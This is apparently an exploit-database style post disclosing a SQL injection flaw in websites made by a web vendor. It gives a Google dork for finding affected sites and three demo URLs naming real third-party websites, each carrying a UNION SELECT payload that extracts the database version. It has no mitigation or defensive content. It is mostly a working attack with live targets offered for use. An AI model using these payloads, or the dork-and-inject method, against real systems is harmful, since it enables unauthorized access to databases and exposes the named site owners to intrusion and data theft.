*********************************************************
#Exploit Title: Impression Technologies – SQL Injection vulnerability
#Date: 2020-08-08
#Exploit Author: Behrouz Mansoori
#Vendor Homepage: https://www.imprtech.com
#Google Dork: "Website | Impression Technologies"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Website | Impression Technologies"
Demo 1: https://www.therobinsonalehouseasburypark.com/gallery.php?id=-1%27%20union%20select%201111,22222,version(),44444,555555,66666,77777,88888,99999,100000--+
Demo 2: https://www.whatudo.com/news.php?id=-1%20union%20select%201,2,3,4,5,6,version()--
Demo 3: https://www.garyusbonds.com/news.php?id=-25%27%20union%20select%201,2,3,4,version()--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************